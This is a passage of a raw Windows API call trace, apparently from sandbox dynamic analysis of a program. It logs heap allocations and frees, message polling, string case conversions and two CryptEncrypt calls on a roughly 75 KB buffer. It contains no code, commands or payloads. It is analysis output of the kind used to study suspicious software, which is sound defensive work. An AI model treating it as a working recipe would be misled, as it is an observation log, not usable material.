Flags=0x0, Size=0x10) returned 0x2aab530 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0213.692] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0213.692] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0213.692] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854470 [0213.692] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0213.693] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0213.693] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0213.693] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0213.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.694] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854470 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0213.694] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0213.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0213.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0213.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0213.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0213.695] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6c8 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0213.695] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0213.695] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.696] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0213.696] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0213.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0213.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0213.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0213.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0213.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab728, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0213.700] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x12697, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x12698) returned 1 [0213.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.700] CharLowerBuffW (in: lpsz="byte[75416]", cchLength=0xb | out: lpsz="byte[75416]") returned 0xb [0213.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.703] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.703] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.703] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.703] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.703] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0213.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab638, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0213.705] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x12697, dwBufLen=0x12698 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x12698) returned 1 [0213.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.709] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.710] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.710] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.710] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.710] 